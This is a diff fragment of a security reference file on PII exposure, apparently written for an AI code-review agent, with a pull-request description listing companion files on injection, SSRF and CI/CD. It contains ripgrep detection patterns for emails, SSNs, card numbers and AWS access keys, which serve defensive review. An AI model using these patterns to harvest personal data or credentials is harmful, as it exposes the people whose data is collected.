+  # email, phone, ipAddress intentionally excluded from public type
+}
+```
+
+### Why This Matters
+
+Over-broad serialization leaks PII to callers who do not need it. A `fields = '__all__'` serializer on a DRF endpoint exposes every column, including fields added by future database migrations. GraphQL introspection with broad types lets callers request any field. Full-row Prisma queries without `select` return password hashes, 2FA secrets, and internal flags. The problem compounds when API responses are cached by CDNs or stored by clients.
+
+### Detection
+
+```bash
+# DRF: serializers that expose all fields
+rg -n "fields = '__all__'" --type py
+
+# Find GraphQL types exposing email or phone
+rg -n 'email|phone|ipAddress|password' --type graphql --type ts | rg 'type |interface '
+
+# Check for full-row returns in API handlers
+rg -n 'findUnique\(|findFirst\(' --type ts | rg -v 'select:'
+```
+
+---
+
+## Scrub PII from Error Responses and Exception Handlers
+
+Error responses sent to clients must contain only a generic message and a correlation ID for server-side lookup. Stack traces, SQL queries, request bodies, and user identifiers belong in server-side logs behind access controls.
+
+### Correct Pattern
+
+**Python:**
+```python
+import uuid
+
+@app.errorhandler(Exception)
+def handle_error(error):
+    correlation_id = str(uuid.uuid4())
+    # Full details stay server-side
+    app.logger.error(
+        "unhandled exception",
+        extra={"correlation_id": correlation_id, "error": str(error)},
+        exc_info=True,
+    )
+    # Client gets only the correlation ID for support reference
+    return {"error": "internal server error", "reference": correlation_id}, 500
+```
+
+**TypeScript:**
+```ts
+app.use((err: Error, req: Request, res: Response, next: NextFunction) => {
+  const correlationId = crypto.randomUUID();
+  console.error({ correlationId, error: err.stack });
+  // Client sees only the reference — no stack, no SQL, no paths
+  res.status(500).json({ error: 'internal server error', reference: correlationId });
+});
+```
+
+### Why This Matters
+
+Unhandled exception responses routinely include SQL query fragments (exposing table names and WHERE clauses with user data), file paths (revealing application structure), environment variables (sometimes including credentials), and the user's request data echoed back (including any PII they submitted). These details aid attackers in refining subsequent attacks and violate privacy expectations when user data appears in error pages viewed by third parties.
+
+### Detection
+
+```bash
+# Find error handlers that may leak details
+rg -n 'err\.stack|error\.stack|traceback|exc_info' --type py --type ts | rg -v 'logger\.|console\.'
+
+# Find exception responses with request data
+rg -n 'request\.(body|data|form)|req\.body' --type py --type ts | rg 'return |res\.(json|send)'
+
+# Check for PII fields in Sentry/error tracking context
+rg -n 'set_user\(|set_context\(|set_extra\(' --type py | rg 'email|phone|ip|address'
+```
+
+---
+
+## Detect Common PII Patterns in Code
+
+Use these detection commands during review to scan for PII that may have been committed inadvertently. These patterns catch the most common cases — real email addresses, phone numbers, and social security numbers in source files.
+
+### Detection Commands
+
+```bash
+# Email addresses (excluding safe domains and common patterns)
+rg -n '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' --type py --type ts --type js \
+  --glob '!node_modules/*' --glob '!vendor/*' | \
+  rg -v 'example\.(com|org|net)|noreply|test@|foo@|bar@|user@|\.invalid'
+
+# US phone numbers (XXX-XXX-XXXX, (XXX) XXX-XXXX, XXX.XXX.XXXX)
+rg -n '\b\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}\b' --type py --type ts --type js \
+  --glob '!node_modules/*'
+
+# US Social Security Numbers (XXX-XX-XXXX)
+rg -n '\b\d{3}-\d{2}-\d{4}\b' --type py --type ts --type js \
+  --glob '!node_modules/*'
+
+# Credit card patterns (13-19 digits, possibly separated by spaces or dashes)
+rg -n '\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{1,7}\b' --type py --type ts --type js \
+  --glob '!node_modules/*'
+
+# IP addresses in non-test code (excluding documentation ranges)
+rg -n '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b' --type py --type ts \
+  --glob '!tests/*' --glob '!*test*' --glob '!node_modules/*' | \
+  rg -v '0\.0\.0\.0|127\.0\.0\.|192\.0\.2\.|198\.51\.100\.|203\.0\.113\.'
+
+# AWS access keys (starts with AKIA)
+rg -n 'AKIA[0-9A-Z]{16}' --type py --type ts --type js
+
+# Customer-specific data patterns in fixtures and tests
+rg -n 'customer.*email|real.*email|production.*data|copied.*from.*ticket' \
+  tests/ fixtures/ --type py --type ts
+```
+
+### Distinguishing Real PII from Safe Placeholders
+
+Before reporting, verify the finding is real:
+
+1. **Check the domain.** RFC 2606 domains (`example.com`, `example.org`, `example.net`, `.invalid`) are safe by design.
+2. **Check the context.** Git author metadata, translator credits, `Co-authored-by` headers, and public package maintainer info are public by choice.
+3. **Check the IP range.** RFC 5737 documentation ranges (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`) and RFC 3849 (`2001:db8::/32`) are reserved for examples.
+4. **Check the file role.** A file in `tests/` with obviously synthetic names and round numbers is fixture data, not a leak.
+5. **Check the sink.** A user email in application memory is normal. The same email in a log statement, URL, metric tag, or error response is a finding.


### PR DESCRIPTION
## Summary
- Adds 6 new reference files to reviewer-system agent covering 5 vulnerability classes: authorization, injection, data exfiltration, CI/CD, and PII exposure
- Creates structured finding template requiring exploitation path, severity evidence, and verification commands — replaces negative exclusion lists with positive structure
- 1,881 lines of CVE-backed security knowledge with detection commands
- Updates reviewer-system Reference Loading Table with signal-based triggers

## Reference files added
- `security-finding-template.md` — structured output format for all security findings
- `security-authz.md` — 7 patterns, 6+ CVEs (IDOR, mass assignment, JWT, sessions)
- `security-injection.md` — 6 patterns, 16+ CVEs (subprocess, deserialization, SSTI, prototype pollution)
- `security-data-exfil.md` — 7 patterns, 11+ CVEs (SSRF, path traversal, SQLi, XXE)
- `security-ci-cd.md` — 7 patterns, 5+ CVEs (GHA exploitation, supply chain)
- `security-pii.md` — 6 patterns (PII in logs, fixtures, errors, serialization)

## Test plan
- [ ] All reference files use positive-instruction format (action headings, correct code first)
- [ ] No "What NOT to Report" sections — structured template filters instead
- [ ] CVEs are real and correctly cited
- [ ] Detection commands use rg/grep and are runnable
- [ ] Reference Loading Table entries match signal patterns